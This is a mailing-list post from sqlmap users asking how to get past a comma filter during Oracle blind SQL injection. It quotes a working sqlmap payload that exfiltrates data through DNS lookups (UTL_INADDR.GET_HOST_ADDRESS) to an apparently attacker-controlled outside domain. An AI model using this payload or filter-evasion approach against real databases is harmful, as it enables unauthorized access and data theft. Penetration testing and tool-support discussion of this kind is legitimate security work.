Heya,
Sqlmap identifies an Oracle blind injection point, but commas are filtered
so I get no data even when using --dns-domain.
Even with --dns-domain there are substrings (,) in query
---
AND ASCII(SUBSTRC((SELECT
UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT
RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM
DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122))
FROM DUAL),8,1))>914 AND (7100=7100)
---
Is there a way to do the technique described on this page with sqlmap?
http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/
M
------------------------------------------------------------------------------
See everything from the browser to the database with AppDynamics
Get end-to-end visibility with application monitoring from AppDynamics
Isolate bottlenecks and diagnose root cause in seconds.
Start your free trial of AppDynamics Pro today!
http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
